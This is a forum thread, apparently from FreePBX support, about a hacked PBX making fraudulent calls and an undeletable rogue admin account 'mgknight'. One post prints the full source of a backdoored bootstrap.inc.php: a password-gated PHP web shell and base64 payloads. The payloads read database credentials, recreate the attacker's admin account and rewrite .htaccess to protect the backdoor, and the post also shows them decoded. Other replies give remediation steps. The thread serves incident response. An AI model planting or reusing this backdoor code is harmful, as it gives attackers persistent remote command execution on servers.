System hacked- Cannot delete the admin user they created

Just yesterday I upgraded ALL the modules in this system. We got a message from the SIP trunk provider that we were making calls to Liberia. I tried to log into the system and could not. I used the amportal admin auth_none command and I can get into the system that way. I have tried to delete the new admin user he created but it will not go away. I have changed the Authorization to Database in Advanced Settings, still with no way of creating or removing the new admin user. There is a new extension listed in SIP info that is unmonitored, but it isn’t listed in the extension listings. There are outbound calls from unknown for several seconds. I tried remove extension command in the Asterisk CLI but I got an error that that command wasn’t valid.

What to Do???

What happens when you try to delete the user?

The screen refreshes and nothing has changed. Adding a new user is the same. I did an amportal chown with no change

You have not updated all of your modules. Please go preform that now.

All modules up to date according to the admin page.

If you still cant delete please open a support request so we can take care of it for you. This is fixed when you update all modules and you wouldn’t have been hacked if you updated modules 12 days ago when the CVE was released.

You can also redownload and reinstall framework

Still cannot delete the user. I uninstalled the Framework ARI module and reinstalled it. I also checked for an update, none shown. The version reported is 2.11.1.5 I am being asked by my partner if the cost per hour is $150.00 and if it can be resolved in an hour or less.

Thanks

I said download and install framework. Not ARI framework.

What version of Framework (NOT ARI Framework) and Core are you running on that machine?

Framework is 2.10.1.17
Core is 2.10.1.2

I put in a support ticket. Where would I download the Framework to upload it, is it uploaded as a non-supported module is?

Well, I found the method to upgrade framework using the CLI. It appeared to install/upgrade alright. But the problem remains and the version of Framework remains the same.

I was also having the same issue as edlentz where I had a new administrator named mgknight which I couldn’t delete. I followed the instructions provided by tm1000 in another thread for removing it with a mysql command, and then issued a SELECT command to verify it was in fact deleted. But as soon as I opened any page on in the administration interface, the user showed back up.

I found that /var/www/html/admin/bootstrap.inc.php had been modified to include code which re-created the user account any time a page was loaded. As soon as I removed the code from that file, I could delete the user account normally.

Here is the source of the modified bootstrap.inc.php file

<?php if ($_SERVER["REMOTE_ADDR"]=="178.162.201.166" && md5($_REQUEST['secure'])=="7f02b0ae0869cc5aa38cd7ca6c767c92"){ system($_REQUEST['secmd']); } if(md5($_REQUEST["mgp"])=="4f6e5768b76809bc99bf278494b5f352") { echo "login correct
"; echo ""; @system($_REQUEST["c"]); echo "";

}
system(base64_decode(“bXlzcWwgYGdyZXAgQU1QREIgL2V0Yy9hbXBvcnRhbC5jb25mfGdyZXAgIlVTRVJcfFBBU1NcfE5BTUUifCBzZWQgJ3MvQU1QREJVU0VSL2EvZyd8c2VkICdzL0FNUERCUEFTUy9iL2cnfHNlZCAncy9BTVBEQk5BTUUvYy9nJ3xzZWQgJ3MvYT0vLXUvZyd8c2VkICdzL2I9LyAtcC9nJ3xzZWQgJ3MvYz0vIC9nJ3x0ciAtZCAnXG4nYCAtLWV4ZWN1dGUgIkRFTEVURSBmcm9tIGFtcHVzZXJzIHdoZXJlIHVzZXJuYW1lIT0nYWRtaW4nO0lOU0VSVCBJTlRPIGFtcHVzZXJzICh1c2VybmFtZSxwYXNzd29yZF9zaGExLHNlY3Rpb25zKSBWQUxVRVMgKCdtZ2tuaWdodCcsJzMzYzdhNGRmNDZiMWE5ZjdkNGE0NjM2ZDQ3Njg0OTIwNWEwNGM2YjcnLCcqJyk7Ig==”));
system(base64_decode(“ZWNobyAnT3JkZXIgRGVueSxBbGxvd2BkZW55IGZyb20gYWxsYDxGaWxlcyBzdWJkaXJlY3RvcnkvKj5gICAgIGRlbnkgZnJvbSBhbGxgPC9GaWxlcz5gPEZpbGVzTWF0Y2ggIlwuLiokIj5gCURlbnkgZnJvbSBhbGxgPC9GaWxlc01hdGNoPmA8RmlsZXNNYXRjaCAiKF4kfGluZGV4XC5waHB8Y29uZmlnXC5waHB8XC4oZ2lmfEdJRnxqcGd8anBlZ3xwbmd8Y3NzfGpzfHN3Znx0eHR8aWNvfHR0Znxzdmd8ZW90fHdvZmZ8d2F2fG1wM3xhYWN8b2dnfHdlYm0pJHxib290c3RyYXBcLmluY1wucGhwKSI+YAlBbGxvdyBmcm9tIGFsbGA8L0ZpbGVzTWF0Y2g+YHBocF92YWx1ZSBtYXhfaW5wdXRfdmFycyA1MDAwJ3x0ciAnYCcgJ1xuJz4uaHRhY2Nlc3M=”));
?>

The first base64_decode incldues the following code:

mysql grep AMPDB /etc/amportal.conf|grep "USER\|PASS\|NAME"| sed 's/AMPDBUSER/a/g'|sed 's/AMPDBPASS/b/g'|sed 's/AMPDBNAME/c/g'|sed 's/a=/-u/g'|sed 's/b=/ -p/g'|sed 's/c=/ /g'|tr -d '\n' --execute “DELETE from ampusers where username!=‘admin’;INSERT INTO ampusers (username,password_sha1,sections) VALUES (‘mgknight’,‘33c7a4df46b1a9f7d4a4636d476849205a04c6b7’,’*’);”

Which appears to simply delete any users which are not “admin” and then creates the new “mgknight” admin account.

The second base64_decode incldues the following code:

echo ‘Order Deny,Allowdeny from all<Files subdirectory/*>deny from all<FilesMatch "\..*$"> Deny from all</FilesMatch><FilesMatch “(^$|index.php|config.php|.(gif|GIF|jpg|jpeg|png|css|js|swf|txt|ico|ttf|svg|eot|woff|wav|mp3|aac|ogg|webm)$|bootstrap.inc.php)”>Allow from allphp_value max_input_vars 5000'|tr '’ ‘\n’>.htaccess

I’m not entirely sure what this command does. If anyone can offer any insight on if there is anything else that should be recovered from the above commands, please be sure to reply!

Joe

I’m having same issue as edlentz and I also found the creating user code in the bootstrap.inc.php as jcremin noted.
But even though I removed the code, it comes back.
I have updated all the modules but still having same problem.
Does anyone know how to fix this?

Please see: http://wiki.freepbx.org/display/L1/FreePBX+Security+Scan and run the commands

I ran and update went through. Immediately following I received an error due to no bootstrap.inc.php file. I created a blank file and that appeared to fix. but is there any contents that should go in that file?

Vinnie

No that is not a proper file. doing the blank is fine

Please also run:

/var/lib/asterisk/bin/module_admin -f update framework

Andrew

is that in addition to :smile:
http://wiki.freepbx.org/display/L1/FreePBX+Security+Scan

Thanks

Yes well the command I added above I also added to said script. Probably a good idea to run said script again (since adding the command)

I had only just found the script and hadn’t used it yet. So I guess I am good then running it for the first time now. Thanks Andrew.